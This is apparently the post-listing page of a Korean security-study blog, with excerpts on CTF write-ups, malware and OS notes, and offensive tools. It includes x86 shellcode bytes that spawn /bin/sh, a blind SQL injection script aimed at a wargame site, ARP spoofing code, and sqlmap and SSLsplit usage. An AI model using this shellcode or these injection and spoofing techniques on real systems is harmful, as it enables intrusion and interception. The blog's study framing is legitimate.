Lucete284

• 여러가지 코딩사이트 http://www.tutorialspoint.com/codingground.htm My Story 2015. 9. 10.

• system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10.

• sqlmap SQLMAP 감지 및 SQL 주입 취약점을 이용하여 데이터베이스 서버의 인계 과정을 자동화하는 오픈 소스 침입 테스트 도구입니다. ,이것은 데이터베이스에서 기본 파일 시스템에 액세스하고 밖을 통해 운영 체제에서 명령을 실행하는 페치 데이터에 궁극적 인 침입 테스터 및 데이터베이스 지문에서 지속 스위치의 넓은 ,범위에 대한 많은 틈새 기능,​​ 강력한 검색 엔진이 포함되어 있습니다 . root@kali:~# sqlmap = automatic SQL injection tool 도움말 root@kali:~# sqlmap -h Usage: python sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced he.. Metasploit/Kali & Backtrack 2015. 9. 9.

• 

  범용 레지스터(General Register) 범용 레지스터(General Register)EAX (AX, AH, AL) - 누적연산기, 곱셈과 나눗셈 연산에서 자동으로 사용EBX (BX, BH, BL) - 베이스 레지스터, 특정 주소를 지정ECX (CX, CH, CL) - 수를 세아림, 자동으로 루프 카운터됨(반복적인 명령을 수행시)EDX (DX, DHT, DL) - 데이터 레지스터, 입출력 연산에서 반드시 간접 주소 지정에 사용ESI (SI) - 읽기 인덱스, 문자열 전송이나 비교에서 사용되는데 주로 소스 문자열의 오프셋을 가리킴EDI (DI) - 쓰기 인덱스 EBP (BP) - 베이스 포인터, 스택의 데이터에 접근하기 위해 사용ESP (SP) - 스택 포인터, 현재까지 사용된 스택의 위치를 저장, 스택 최상부의 오프셋을 가리킴EIP - 명령어 .. Security Study/Reversing 2015. 9. 8.

• arp spoofing.c 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. #include "Arp.h" int main(int argc, char **argv) { pcap_if_t *alldevs; pcap_if_t *d; int inum; pcap_t *adhandle; char packet_filter[] = ""; struct bpf_program fcode; u_int netmask; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; int .. Language 2015. 9. 8.

• Mac Capture.c #define WPCAP #define HAVE_REMOTE #include "pcap.h" #include #include typedef struct arphdr { u_char DMac[6]; // target hardware address u_char SMac[6]; // sender hardware address u_int16_t type; // operation code u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // I.. Language 2015. 9. 8.

• blind sql injection.py #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and(substring(pw," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) req.add_header('cookie',"ASPSESSIONIDSSATDDSQ=EMNOHBMDIHNLAAFFOHICOODE") res = urllib2.urlop.. Language 2015. 9. 8.

• base 64 encoding import base64 str64="0cc175b9c0f1b6a831c399e2697726618277e0910d750195b448797616e091ad6f8f57715090da2632453988d9a1501b865c0c0b4ab0e063e5caa3387c1a87417b8b965ad4bca0e41ab51de7b31363a1d41d8cd98f00b204e9800998ecf8427e" # base 64구문str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Language 2015. 9. 8.

• SSLsplit SSLsplit 네트워크 연결을 암호화 SSL / TLS에 대한 man-in-the-middle 공격하기위한 도구입니다. 주소 변환 엔진을 통해 차단하여 SSLsplit로 리디렉션됩니다. SSLsplit는 SS L / TLS를 종료하고 전송 된 모든 데이터를 기록 할 때 원래의 목적지 주소에 새로운 SSL / TLS 연결을 시작합니다. SSLsplit는 공개 키 핀 고정을 방지하기 위해 HPKP 응답 헤더를 제거합니다. 도움말 root@kali:~# sslsplit -h Usage: sslsplit [options...] [proxyspecs...] -c pemfile use CA cert (and key) from pemfile to sign forged certs -k pemfile use CA ke.. Metasploit/Kali & Backtrack 2015. 9. 7.

• 

  Challenge 36 - Back Up 문제에 들어가게 되면 저말이 끝이다... 소스를 봐도 아무말이 없다... 그치만 vi 로 작업하던 도중 blackout 정전이 됬다는 것을 짐작 할수 있다. 리눅스 vi를 이용해보면 vi 쓰는 도중 백업파일로 .swp라는 파일이 만들어지는 것을 볼 수있다. 이로 우리는 짐작으로 /.index.php.swp를 입력하면(.은 현재 폴더를 나타냄) good! 이라고 나오고 password 는 md5로 되어 있다고 나온다 이로 REMOTE_ADDR => IP + dlseprtmvpdlwlfmfquswhgkwkglgl을 md5로 해쉬한 값이 password이다. 이로 문제 Clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5.

• 

  Chellenge 39 - ??? 문제를 들어가면 빈칸이다 그럼 소스부터보자!!!소스를 확인 하면 index.phps로 이동 하라 한다. 들어가자! 들어가면 이러한 소스가 나오는데 ... 소스를 분석해보자. 여기서의 mysql_fetch_array()는 에러가 뜨는 mysql_fetch_array() 호출문인 $q=mysql_fetch_array(mysql_query("select 'good' from zmail_member where id='$_POST[id]")); 자세히 살펴보면 id = '$_POST[id] 에서 싱글쿼터가 닫혀 있지 않다. 따라서 에러가 발생하는 문제점을 이용하는 문제이다. 이제 에러 부분을 찾았고 $_POST[id] 에 대한걸 더 분석해보면 여기서 최대길이가 15글자라고 하는 힌트를 얻을 수 있다. $_POST.. Wargame/CTF(Capture The Flag) 2015. 9. 5.

• 

  Challenge 27 - SQL Injection 먼저 27번을 들어가게 되면 위의 사진처럼 sql injection문제라는 것을 알수 있다. 이제 소스를 보게 되면 if(eregi~~~)를 보게 되면 union등을 쓰면 no hack 이라는 말을 띄우는 것을 확인 할수 있다. 우리는 admin의 값을 받으면 답을 얻을 수있는데 과연 ??? 우리는 이제 쿼리문을 넣어 injection을 해야하는데 -1) or no like 1--(공백)을 입력하면 guest라는 말이 나오는 것을 확인할 수있다.-1) or no like 1-- 는 no=1 이라는 의미로 이제 guest값을 얻어 냈으니 -1) or no like 2--(공백)을 입력하면 문제 Clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5.

• 

  Challenge10 - buy lotto 먼저 문제들어가서 소스를 보면 마우스를 올렸을 경우 0가 Y0U로 바뀌고 1씩 이동하다가 800이 되면 clear가 된다.이러하게 나와 있는 것을 이제 한번씩 클릭을 세월아 내월아~ 크롬에서는 script를 쉽게 바꿀수 있다. 이를 이용하여 노란 부분 즉 position:relative:left:0 이부분을 799로 바꾸자.그리고 0을 한번 클릭 하면 clear인데 0이 클릭이 안된다. 그럼 콘솔에서 hackme.style.posLeft=799를 입력하고 클릭해보자! -그럼 클리어!!! Wargame/CTF(Capture The Flag) 2015. 9. 5.

• 

  Challenge 38 - Log Injection webhacking.kr 38번 문제를 먼저보게 되면 사이트를 접속하게 되면 이러한 화면이 나온다.이로 LOG Injection이라는 문제라는 것을 쉽게 확인 할수 있다.먼저 aaaaaaaaa을 입력하여 어떠한 변화가 있는지 확인 하여보자 입력을 하니 아무런 변화가 없는 것을 확인 할 수있다. 그럼 admin을 입력하여 보면 이러한 창이 나오는 것을 알 수 있다. 이는 admin이 아니라는 소리니깐 login 옆에 있는 admin을 클릭 해보자 그럼 자신의 ip :aaaaaaaaaa라고 입력한 글을 볼수 있다. 그럼 다시 처음으로 돌아와 자신의 ip:admin을 입력하면 webhacking.kr 을 쉽게 clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5.

• how to hack wifi using backtrack What You'll NeedUnless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood secur.. Metasploit/Kali & Backtrack 2015. 9. 3.

• 악성코드 수집 및 분석 방법 HONEY POT을 이용한 악성코드 수집 - 취약한 가상 시스템을 통해 공격자를 유인하여 공격자의 공격정보를 수집하는 시스템 종류 KIPPO - ssh기반 공격 정보를 수집하는 허니팟Glastopf - SQL 인젝션 공격 에물레이터 가능한 허니팟Dionaea - HTTP, FTP, SMB 등의 서비스 등으로 접근하는 악성코드를 수집하는 허니팟 Honey Client를 이용한 악성코드 수집 Honey Client란? 웹 브라우저 통해 특정 웹사이트를 방문 후 발생하는 악성파일을 능동적으로 수집하는 시스템 Honey Client 수집 과정 1-웹 크롤러를 통해 단순 페이지가 수집이 아닌 url의 파일 확장명이 .exe등을 수집2-파일 헤더 부분을 검사하여 실행파일 인지 검증3-바이러스 토탈 또는 분석 환경을.. Malware 2015. 9. 3.

• fedora원정대 core 1,2,3,4 Wargame/CTF(Capture The Flag) 2015. 9. 3.

• 운영체제 운영체제: 시스템 자원(하드웨어+소프트웨어)을 효율적으로 사용하고, 컴퓨터-사용자 간에 편리한 인터페이스를 제공하며처리능력(Throughput), 신뢰도(Reliability), 사용가능도(Availability)의 향상과 반환시간(Turnaround time)을 단축하여 주는 역할을 한다. (1) 운영체제의 주요기능 ① 프로세스 관리: 하드웨어에 의존하는 가장 하위 단위 수준으로 프로세스 스케줄링을 통해 실행 가능한 프로세스를 추적 관리 한다. ② 주기억장치 관리: 주기억장치의 접근을 관리 제어하는 장치부분으로 주소변환, 기억보호, 버퍼기억 등의 기능을 수행한다. ③ 보조기억장치 관리: 하드디스크와 같은 보조 기억장치에 대한 접근관리, 제어 등을 수행한다. ④ 입출력시스템 관리: 중앙기억장치와 외부 입.. Security Study/System Security 2015. 9. 3.

• 시스템과 관련한 보안 기능 시스템과 관련한 보안 기능 계정과 패스워드 관리 적절한 권한을 가진 사용자를 식별하기 위한 가장 기본적인 인증 수단 시스템에서는 계정과 패스워드 관리가 보안의 시작 세션 관리 사용자와 시스템 또는 두 시스템 간의 활성화된 접속에 대한 관리 일정 시간이 지날 경우 적절히 세션을 종료하고, 비 인가자에 의한 세션 가로채기를 통제 접근 제어 시스템이 네트워크 안에서 다른 시스템으로부터 적절히 보호될 수 있도록 네트워크 관점에서 접근을 통제 권한 관리 시스템의 각 사용자가 적절한 권한으로 적절한 정보 자산에 접근할 수 있도록 통제 로그 관리 시스템 내부 혹은 네트워크를 통한 외부에서 시스템에 어떤 영향을 미칠 경우 해당 사항을 기록 취약점 관리 시스템은 계정과 패스워드 관리, 세션 관리, 접근 제어, 권한 관리.. Security Study/System Security 2015. 9. 3.

• 보안관제의 개념 보안의 개념- 보안이란 허락되지 않은 접근, 수정, 노출, 훼손, 파괴 등의 다양한 사이버상의 위협으로부터 정보를 보호하는 것이다. - 보안은 사이버 공간에서 정보 보호의 보안 정책을 수립하고, 위협에 대한 예방책을 세우며, 시스템에 대한 접근 및 운영을 통제하고 외부의 침입이 발생했을 때 빠르게 탐지해 대응하거나 손상된 시스템을 복구하는 등의 다양한 활동이 있다 - 보안은 사이버상의 각종 위협으로부터 정보를 보호하기 위한 다양한 활동을 말한다. 보안관제의 개념- 한국 산업 보안 학회에서는 “정책 위반 또는 침입으로부터 시스템과 네트워크 자원의 손상을 막기 위해 관제가 필요한 모든 시스템을 실시간으로 모니터링하여 즉각 대응, 관리할 수 있도록 전문 보안 업체가 해당 인력, 절차, 기술 및 전문 지식을 제.. Security Study/System Security 2015. 9. 3.

• 바이러스 종류 바이러스• 사용자 컴퓨터(네트워크로 공유된 컴퓨터 포함) 내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변형을 복사하는 프로그램이다.• 가장 큰 특성은 복제와 감염이다. 다른 네트워크의 컴퓨터로 스스로 전파되지는 않는다. 웜•인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 악성 프로그램이다.• 윈도우의 취약점 또는 응용 프로그램의 취약점을 이용하거나 이메일이나 공유 폴더를 통해 전파되며, 최근에는 공유 프로그램(P2P)을 이용하여 전파되기도 한다.•바이러스와 달리 스스로 전파되는 특성이 있다. 트로이 목마• 바이러스나 웜처럼 컴퓨터에 직접적인 피해를 주지는 않지만, 악의적인 공격자가 컴퓨터에 침투하여 사용자의 컴퓨터를 조종할 수 있는 프로그램이다.• 고의적으로 만.. Security Study/System Security 2015. 9. 3.

• 바이러스의 정의 바이러스의 정의- 악성코드 중에 가장 기본적인 형태- 사용자 컴퓨터(네트워크로 공유된 컴퓨터 포함) 내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변형을 복사하는 프로그램을 말함- 최초의 악성 코드가 만들진 1980년대 이후에서 2000년대 초반까지 악성 코드의 주류를 차지 1세대 : 원시형 바이러스부트 바이러스플로피 디스크나 하드 디스크의 부트 섹터에 감염되는 바이러스로, 부팅할 때 자동으로 동작* 1단계 : POSTPOST는 하드웨어 자체가 시스템에 문제가 없는지 기본 사항을 스스로 체크하는 과정BIOS에 의해서 실행되는데, POST 도중 하드웨어에서 문제가 발견되면 사용자에게 여러 방법으로 그 문제를 알림.* 2단계 : CMOSCMOS에서는 기본 장치에 대한 설정과 부.. Security Study/System Security 2015. 9. 3.

• 웜이란? 웜의 등장* 웜(Worm)은 인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 프로그램을 의미* 1999년 다른 사람의 이메일 주소를 수집하고 스스로 전달되는 형태의 인터넷 웜이 출현하면서 일반인에게 웜이라는 용어가 알려지기 시작* 이메일에 첨부 파일 형태로 첨부되어 확산되거나, 운영체제나 프로그램의 보안 취약점을 이용하여 스스로 침투하는 것이 일반적* 현재는 mIRC 채팅 프로그램, P2P 파일 공유 프로그램, 이메일 관련 스크립트 기능, 네트워크 공유 기능 등의 허점을 이용하여 확산하고 증식하는 경우도 있어 피해와 부작용의 범위/크기가 계속 커지고 있음. MASS Mailer형 웜* MASS Mailer형 웜은 자기 자신을 포함하는 대량 메일 발송을 통해 확산* 최근 발생한 웜 중 약 40%.. Security Study/System Security 2015. 9. 3.

• 네트워크 상태 점검 네트워크 상태 점검하기시스템에서는 netstat와 같은 명령으로 열려 있는 포트를 확인할 수 있음. 네트워크 상태 점검하기* 악성코드가 사용하는 포트를 확인하기 어려운 경우 CPorts와 같은 프로그램을 사용하여 서비스 포트별로 사용하는 응용 프로그램을 확인할 수 있음.* BackDoor-DVR를 실행한 뒤 CPorts에서 활성화된 네트워크 항목을 살펴보면 특이한 연결이 존재 정상적인 프로세스와 비교하기* 윈도우와 유닉스 시스템 등의 정상적인 프로세스를 외워두면 비정상적인 프로세스를 식별하는 데 많은 도움이 됨.* 윈도우 시스템이 동작하기 위한 기본 프로세스 - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : 윈도우 콘솔을 관장하고, 스레드를 생성·삭제하며.. Security Study/System Security 2015. 9. 3.

• 악성코드 대응 네트워크 상태 점검하기시스템에서는 netstat와 같은 명령으로 열려 있는 포트를 확인할 수 있음. 네트워크 상태 점검하기* 악성코드가 사용하는 포트를 확인하기 어려운 경우 CPorts와 같은 프로그램을 사용하여 서비스 포트별로 사용하는 응용 프로그램을 확인할 수 있음.* BackDoor-DVR를 실행한 뒤 CPorts에서 활성화된 네트워크 항목을 살펴보면 특이한 연결이 존재 정상적인 프로세스와 비교하기* 윈도우와 유닉스 시스템 등의 정상적인 프로세스를 외워두면 비정상적인 프로세스를 식별하는 데 많은 도움이 됨.* 윈도우 시스템이 동작하기 위한 기본 프로세스 - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : 윈도우 콘솔을 관장하고, 스레드를 생성·삭제하며.. Security Study/System Security 2015. 9. 3.